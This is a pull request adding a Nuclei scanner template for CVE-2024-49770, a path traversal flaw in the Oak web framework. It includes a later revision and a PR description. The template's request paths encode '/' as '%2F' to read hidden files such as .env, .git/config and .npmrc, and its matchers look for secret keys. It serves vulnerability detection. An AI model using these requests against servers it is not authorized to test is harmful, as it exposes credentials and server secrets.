### PR TITLE
Create CVE-2024-49770

### DIFF
--- a/http/cves/2024/CVE-2024-49770.yaml
+++ b/http/cves/2024/CVE-2024-49770.yaml
@@ -1,0 +1,41 @@
+id: CVE-2024-49770
+
+info:
+  name: Oak Path Traversal to Access Hidden Files
+  author: KoYejune0302
+  severity: high
+  description: |
+    Oak (<= 14.1.0) is vulnerable to path traversal, allowing access to hidden files
+    by encoding `/` as `%2F`. This can lead to exposure of sensitive data such as
+    `.env`, `.git/config`, `.htaccess`, and other hidden files.
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
+    cvss-score: 7.7
+    cve-id: CVE-2024-49770
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-49770
+    - https://github.com/oakserver/oak/security/advisories/GHSA-qm92-93fv-vh7m
+  tags: cve,cve2024,oak,path-traversal,hidden-files
+
+requests:
+  - method: GET
+    stop-at-first-match: true
+    path:
+      - "{{BaseURL}}/temp%2f../.env"
+      - "{{BaseURL}}/temp%2f../.git/config"
+      - "{{BaseURL}}/temp%2f../.htaccess"
+      - "{{BaseURL}}/temp%2f../.npmrc"
+      - "{{BaseURL}}/temp%2f../.dockerignore"
+
+    matchers:
+      - type: regex
+        regex:
+          - "SECRET_KEY="
+          - "\\[core\\]"
+          - "AuthType"
+          - "registry="
+          - "docker"
+          - "KEY="
+          - "API_KEY="
+        condition: or
+        part: body

--- a/http/cves/2024/CVE-2024-49770.yaml
+++ b/http/cves/2024/CVE-2024-49770.yaml
@@ -1,25 +1,26 @@
 id: CVE-2024-49770
 
 info:
-  name: Oak Path Traversal to Access Hidden Files
+  name: Oak Framework - Path Traversal
   author: KoYejune0302
   severity: high
   description: |
-    Oak (<= 14.1.0) is vulnerable to path traversal, allowing access to hidden files
-    by encoding `/` as `%2F`. This can lead to exposure of sensitive data such as
-    `.env`, `.git/config`, `.htaccess`, and other hidden files.
-  classification:
-    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
-    cvss-score: 7.7
-    cve-id: CVE-2024-49770
+    `oak` is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. By default `oak` does not allow transferring of hidden files with `Context.send` API. However, prior to version 17.1.3, this can be bypassed by encoding `/` as its URL encoded form `%2F`. For an attacker this has potential to read sensitive user data or to gain access to server secrets. Version 17.1.3 fixes the issue.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2024-49770
     - https://github.com/oakserver/oak/security/advisories/GHSA-qm92-93fv-vh7m
-  tags: cve,cve2024,oak,path-traversal,hidden-files
+    - https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125
+    - https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25
+    - https://github.com/oakserver/oak/commit/4b2f27efd5cba5a45b2c3982e610da3af0869209
+  classification:
+    epss-score: 0.00045
+    epss-percentile: 0.17569
+  metadata:
+    verified: true
+  tags: cve,cve2024,oak,lfi,oos
 
-requests:
+http:
   - method: GET
-    stop-at-first-match: true
     path:
       - "{{BaseURL}}/temp%2f../.env"
       - "{{BaseURL}}/temp%2f../.git/config"
@@ -27,8 +28,10 @@ requests:
       - "{{BaseURL}}/temp%2f../.npmrc"
       - "{{BaseURL}}/temp%2f../.dockerignore"
 
+    stop-at-first-match: true
     matchers:
       - type: regex
+        part: body
         regex:
           - "SECRET_KEY="
           - "\\[core\\]"
@@ -38,4 +41,3 @@ requests:
           - "KEY="
           - "API_KEY="
         condition: or
-        part: body


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2024-49770
```
`oak` is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. By default `oak` does not allow transferring of hidden files with `Context.send` API. However, prior to version 17.1.3, this can be bypassed by encoding `/` as its URL encoded form `%2F`. For an attacker this has potential to read sensitive user data or to gain access to server secrets. Version 17.1.3 fixes the issue.
```
- References:
https://nvd.nist.gov/vuln/detail/CVE-2024-49770

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)